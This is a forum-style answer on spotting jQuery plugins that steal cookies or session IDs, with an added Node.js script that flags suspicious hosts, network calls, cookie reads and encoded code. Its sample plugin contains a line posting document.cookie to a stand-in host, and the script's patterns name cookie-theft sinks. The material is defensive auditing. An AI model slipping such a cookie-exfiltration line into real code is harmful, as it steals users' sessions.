I am usually downloading several jQuery plugins.
How can I check whether the script is stealing any information (such as user cookie, session id...) and sending it to its developer’s server?
In PHP, we are checking backdoor scripts by looking for some functions (system, passthru, shell_exec, etc). Is there any such type of function in JavaScript to connect to its developer's site?
Obviously, your first step should be to read the code. There are a number of tell-tale signs you can look for, including looking for URLs in the code, and any encrypted code.
Of course, some code may be too complex to make this a realistic suggestion, particularly if it’s been minified and obfuscated, but it should be possible to scan through it. If it is doing anything like this, it’ll be using the same functions it uses to communicate with your own site (i.e. jQuery’s ajax functions), so you won’t see specific function calls that raise suspicion, but suspect URLs in the code should be checked out, and you should definitely avoid encrypted code (obfuscated is generally okay, but not encrypted).
Secondly, search the internet for other people commenting about the plugin. If there is anything untoward happening, it’s likely that other people will have noticed it. Avoid using plugins that don’t have enough users to get any comments one way or the other.
Finally, use a tool like Firebug to watch for HTTP requests that occur while you’re using a site containing the plugin. If it’s communicating with base, it can’t hide from you; the browser’s debugging tools will happily show you what you need to know.
Hope that helps.
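Added example, not part of the original answer: a small Node.js script for the code-reading step above. It lists hosts in a plugin's source that are not on an allowlist, the network and cookie/storage APIs it touches, and long encoded string literals. The function name, the pattern lists and the sample plugin are assumptions constructed for illustration.

```javascript
// Added example: static triage of a third-party plugin's source text.
// All names here (auditPluginSource, SINKS, SAMPLE) are hypothetical.
const URL_RE = /(?:\b(?:https?|wss?):)?\/\/([a-z0-9-]+(?:\.[a-z0-9-]+)+)/gi;
// Long base64-looking or \xNN-escaped string literals: code you cannot read.
const BLOB_RE = /["'](?:[A-Za-z0-9+\/]{80,}={0,2}|(?:\\x[0-9a-fA-F]{2}){20,})["']/g;
const SINKS = {
  // Ways a script can talk to a server, including jQuery's own ajax helpers.
  network: /(?:\$|\bjQuery)\.(?:ajax|get|post|getJSON|getScript)\b|\bXMLHttpRequest\b|\bfetch\s*\(|\bsendBeacon\b|\bnew\s+Image\b|\bWebSocket\b/g,
  // Reads of data worth protecting.
  sensitiveRead: /\bdocument\.cookie\b|\b(?:local|session)Storage\b/g,
  // Primitives that turn opaque strings into running code.
  dynamicCode: /\beval\s*\(|\bnew\s+Function\b|\batob\s*\(|\bunescape\s*\(|\bString\.fromCharCode\b/g,
};

function auditPluginSource(source, allowedHosts = []) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const hosts = new Set();
  for (const m of source.matchAll(URL_RE)) {
    const host = m[1].toLowerCase();
    if (!allowed.has(host)) hosts.add(host);
  }
  const report = { unexpectedHosts: [...hosts].sort() };
  for (const [kind, re] of Object.entries(SINKS)) {
    // Drop the trailing "(" so "fetch(" and "fetch (" report as one hit.
    const hits = [...source.matchAll(re)].map((m) => m[0].replace(/\s*\($/, ""));
    report[kind] = [...new Set(hits)];
  }
  report.encodedBlobs = (source.match(BLOB_RE) || []).length;
  return report;
}

// Constructed sample plugin, not taken from any real project.
const SAMPLE = `
(function ($) {
  $.fn.tooltipLite = function () {
    // docs: https://plugins.example.org/tooltip-lite
    $.post("https://stats.example.net/collect", { c: document.cookie });
    return this;
  };
})(jQuery);
`;

console.log(auditPluginSource(SAMPLE, ["plugins.example.org"]));
```

A clean report does not clear a plugin, since obfuscated code can assemble a URL at run time; the request log in the browser's debugging tools shows what is actually sent.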